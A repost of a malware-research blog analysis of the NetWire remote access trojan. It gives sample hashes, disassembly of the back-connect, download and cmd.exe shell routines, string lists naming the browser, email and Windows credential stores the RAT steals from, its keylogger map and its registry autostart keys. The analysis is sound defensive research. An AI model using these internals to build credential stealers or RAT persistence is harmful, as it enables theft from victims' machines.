800+ IT
News
als RSS Feed abonnieren📚 MMD-0031-2015 - What is NetWire (multi platform) RAT?
💡 Newskategorie: Video
🔗 Quelle: blog.malwaremustdie.org
The background
It has been a talk internally in our group about a RAT (Remote Access Trojans) that is commonly found and used by crooks called "NetWire RAT". The talks is about why this RAT was commonly found during the carding, POS or etc hack cases related to the cyber criminal activities, and is this RAT multi platform supported, etc..
Shortly, I think it will be good if I post it here a thorough reference for my friend and also the fellow researchers + industries to understand about the threat (if not known this yet) and to raise the awareness to the internet users of the existence of this malware (RAT family). This is a generally writing post, and I will add with some details later along with the more thorough check & investigation. Comments are welcome to add your vision to this threat, enjoy!
The samples
Samples can be randomly search in Virus Total with the below hashes:
07470d9b10cefa3a7dcb3a156f067203
9769cf1ab9fc54d1d7da644d94644273
1c1c848bbefe6d8353010619d50ef81f
1931bcb54655ca2018fec60bf84776f7
674d9a19d4e0c72c47738d7ae59c351c
45db57d2c15bf1f9dde1cbe8202323f3
64cf99ed2d02bb22eaad9e9699631424
628cf758e08575c475787e9caa2702eb
1e65e53427319e10ef3ee114caa2c638
The origin
Below is the origin of this threat, it was starting from 2012, with the complete explanation from its malware author. I made a loong picture for it, so please be patient with the download. Here we go:
Installation and howto
A howto for this RAT explained by the author is as per below pictures. Please click them one by one sequentially.
Specific characteristic
Some characteristic in reversing point of view will be explained in this section as a quicky. Feel free to examine deeper. I used the sample with hash 1931bcb54655ca2018fec60bf84776f7 which I thought was the latest that I can find and it is obviously the trial version of this RAT as per seen in uploaded data below:
md5: 1931bcb54655ca2018fec60bf84776f7
directory: userprofile%\desktop\netwire-trial\
filename: doit.exe
Binary analysis in PEStudio
I'm a big fan and ssupporter to Marc's PEStudio, it detected this RAT pretty good, below is the original indicators spotted for helping you in analyzing this RAT:
Reversing & strings
Back connect
Back connect functionality can be seen in the function below using the HTTP/1.0:
; start addr 0x40391C
; callback functions in HTTP/1.0
push ebp
mov ebp, esp
push edi
push esi
push ebx
sub esp, 22Ch
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_8]
mov [esp+238h+var_228], eax
mov eax, [ebp+arg_4]
mov [esp+238h+var_22C], eax
mov [esp+238h+var_230], offset aConnectSDHttp1 ; "CONNECT %s:%d HTTP/1.0\n\n"
mov [esp+238h+var_234], 200h
lea ebx, [ebp+var_218]
mov [esp+238h+var_238], ebx
call 0x4094C7
mov edi, eax
mov [esp+238h+var_22C], 0
mov [esp+238h+var_230], eax
mov [esp+238h+var_234], ebx
mov [esp+238h+var_238], esi
call send
sub esp, 10h
Download function
It uses HTTP/1.1 for the download functions..
; in proc addr 0x4050F3
; download functions in HTTP/1.1
mov eax, [ebp+arg_0]
lea edx, [eax+204h]
mov [esp+868h+var_858], edx
mov [esp+868h+var_85C], eax
mov [esp+868h+var_860], offset aGetSHttp1_1Hos ; "GET %s HTTP/1.1\r\nHost: %s \r\nConnection:"...
mov [esp+868h+var_864], 800h
lea ebx, [ebp+var_818]
mov [esp+868h+var_868], ebx
call 0x4094C7
xor eax, eax
or ecx, 0xFFFFFFFFh
mov edi, ebx
repne scasb
not ecx
dec ecx
mov [esp+868h+var_85C], 0
mov [esp+868h+var_860], ecx
mov [esp+868h+var_864], ebx
mov eax, [ebp+var_82C]
mov [esp+868h+var_868], eax
call send
sub esp, 10h
mov [esp+868h+var_864], offset aWb_0 ; "wb"
mov eax, [ebp+arg_0]
add eax, 408h
mov [esp+868h+var_868], eax
call fopen
mov edi, eax
test eax, eax
Shell
Attempt to gain access to the Windows OS shell (cmd.exe) is spotted after some check to the environment was done, as per below:
; shell was gained in here (cmd.exe)
; after checking environment
; function in addr 0x4056A0
push ebp
mov ebp, esp
push edi
push esi
push ebx
sub esp, 2CCh
mov [esp+2D8h+var_2D8], offset aComspec ; "ComSpec"
call getenv
mov [esp+2D8h+var_2CC], eax
mov [esp+2D8h+var_2D0], offset aS_0 ; "%s"
mov [esp+2D8h+var_2D4], 204h
lea ebx, [ebp+var_21C]
mov [esp+2D8h+var_2D8], ebx
call 0x4094C7
mov [esp+2D8h+var_2D8], ebx
call 0x4047A1
test al, al
jnz short 0x40570E
:
; in addr 0x40570E
mov [esp+2D8h+var_2D8], offset aWindir ; "WINDIR"
call getenv
mov [esp+2D8h+var_2CC], eax
mov [esp+2D8h+var_2D0], offset aSSystem32Cmd_e ; "%s\\system32\\cmd.exe"
mov [esp+2D8h+var_2D4], 204h
mov [esp+2D8h+var_2D8], ebx
Credential Grabber
The below string list will be enough to describe what is being aimed by this RAT:
.data:0x40FA03 SOFTWARE\\Mozilla\\%s\\
.data:0x40FA18 CurrentVersion
.data:0x40FA27 SOFTWARE\\Mozilla\\%s\\%s\\Main
.data:0x40FA43 Install Directory
.data:0x40FA55 %s\\%s
.data:0x40FA5B mozutils.dll
.data:0x40FA68 mozglue.dll
.data:0x40FA74 mozsqlite3.dll
.data:0x40FA83 Mozilla Firefox
.data:0x40FA93 APPDATA
.data:0x40FA9C %s\\Mozilla\\Firefox\\profiles.ini
.data:0x40FABC %s\\Mozilla\\Firefox\\%s
.data:0x40FAD2 Mozilla Thunderbird
.data:0x40FAE6 %s\\Thunderbird\\profiles.ini
.data:0x40FB02 %s\\Thunderbird\\%s
.data:0x40FB14 SeaMonkey
.data:0x40FB20 %s\\Mozilla\\SeaMonkey\\profiles.ini
.data:0x40FB42 %s\\Mozilla\\SeaMonkey\\%s
.data:0x40FB5A %s\\signons.sqlite
.data:0x40FB6C NSS_Init
.data:0x40FB75 PK11_GetInternalKeySlot
.data:0x40FB8D PK11_Authenticate
.data:0x40FB9F NSSBase64_DecodeBuffer
.data:0x40FBB6 PK11SDR_Decrypt
.data:0x40FBC6 PK11_FreeSlot
.data:0x40FBD4 NSS_Shutdown
.data:0x40FBE1 sqlite3_open
.data:0x40FBEE sqlite3_close
.data:0x40FBFC sqlite3_prepare_v2
.data:0x40FC0F sqlite3_step
.data:0x40FC1C sqlite3_column_text
.data:0x40FC30 select *from moz_logins
.data:0x40FC4A %c%s\a%s\a%s\b\b\b\b
.data:0x40FC59 %s\\Opera\\Opera\\wand.dat
.data:0x40FC74 %s\\Opera\\Opera\\profile\\wand.dat
.data:0x40FC94 rb
.data:0x40FC97 \b\b\b\b
.data:0x40FC9C %s\\.purple\\accounts.xml
.data:0x40FCB4
.data:0x40FCBF %d%s\a
.data:0x40FCC5
.data:0x40FCCC
.data:0x40FCD7 %s\a
.data:0x40FCDB advapi32.dll
.data:0x40FCE8 CredEnumerateA
.data:0x40FCF7 CredFree
.data:0x40FD00 WindowsLive:name=*
.data:0x40FD16 %d%s\a%ws\a
.data:0x40FD20 Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676
.data:0x40FD9B Email
.data:0x40FDA1 POP3 User
.data:0x40FDAB POP3 Server
.data:0x40FDB7 POP3 Password
.data:0x40FDC5 IMAP User
.data:0x40FDCF IMAP Server
.data:0x40FDDB IMAP Password
.data:0x40FDE9 HTTP User
.data:0x40FDF3 HTTP Server
.data:0x40FDFF HTTP Password
.data:0x40FE0D SMTP User
.data:0x40FE17 SMTP Server
.data:0x40FE23 SMTP Password
.data:0x40FE94 Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2
.data:0x40FEDE index.dat
.data:0x40FEE8 History
.data:0x40FEF0 Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders
.data:0x40FF34 %s\\Google\\Chrome\\User Data\\Default\\Login Data
.data:0x40FF64 %s\\Chromium\\User Data\\Default\\Login Data
.data:0x40FFAC localhost
.data:0x40FFB6 USERNAME
.data:0x40FFBF Unknown
.data:0x40FFC7 kernel32.dll
.data:0x40FFD4 GetNativeSystemInfo
.data:0x40FFE8 SYSTEM\\CurrentControlSet\\Control\\ProductOptions
.data:0x410018 ProductType
.data:0x410024 WINNT
.data:0x41002A LANMANNT
.data:0x410033 SERVERNT
.data:0x41003C %d
.data:0x41003F GlobalMemoryStatusEx
.data:0x410054 WINDIR
.data:0x41005B PATH
.data:0x410060 %s\a%s\a%s\a%I64u\a%I64u\a%I64u\a%s\a%s\a%s\a%s\a%d\a%s\a%d\a%s\a%d\a%s\a%d\a
Keystroke Mapping from remote operation
This one is also self-explanatory:
.data:0x41020C [Backspace]
.data:0x410218 [Enter]
.data:0x410220 [Tab]
.data:0x410226 [Arrow Left]
.data:0x410233 [Arrow Up]
.data:0x41023E [Arrow Right]
.data:0x41024C [Arrow Down]
.data:0x410259 [Home]
.data:0x410260 [Page Up]
.data:0x41026A [Page Down]
.data:0x410276 [End]
.data:0x41027C [Break]
.data:0x410284 [Delete]
.data:0x41028D [Insert]
.data:0x410296 [Print Screen]
.data:0x4102A5 [Scroll Lock]
.data:0x4102B3 [Caps Lock]
.data:0x4102BF [Alt]
.data:0x4102C5 [Esc]
.data:0x4102CB [Ctrl+%c]
Autostart
I almost forget this one..
.data:0x4100A5 SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\the %s value is like below:
.data:0x4100D4 SOFTWARE\\Microsoft\\Active Setup\\Installed Components
.data:0x41010F SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\%s
.data:0x41014C StubPath
{ND34H04A-G0C3-3VIE-0550-N18U87UEDA40} Many other function too, please feel free to check it yourself, for practise :)
Signature and Prologue
For getting a bit of idea in mitigation and detecting this sample, I modified a sample filtration signature that can be accessed in -->[here] on a Yara rule format. It is NOT an official Yara rules, and I posted here for an example and research purpose, some trimmed codes was done for the adjustment, and I may modify this for the better detection purpose too.
PS: It's good to be back :-)
Kudos researcher friends w/feedback, thank you!
@MalwareMustDie Thanks for sharing. Have you check the commands? to see if they match previous version analyzed? https://t.co/QhNHOxD7E9
— Alexandre Dulaunoy (@adulau) April 6, 2015@MalwareMustDie the "New Profile" menu in NetWire Workstation lets you select "GNU/Linux". @rmsthebot would be proud!
— Dan Helton (@ch1kpee) April 6, 2015@MalwareMustDie Very good finding! "Keystroke Mapping" detection will be added to the next #pestudio pic.twitter.com/u14fu59pwd
— Marc Ochsenmeier (@ochsenmeier) April 6, 2015NetWire RAT gives HKCU Run key and ActiveX #persistence options. Nice find @MalwareMustDie! https://t.co/GtesYXFAW9 pic.twitter.com/bRzHMPd69w
— Huntress Labs (@HuntressLabs) January 20, 2016#MalwareMustDie!
...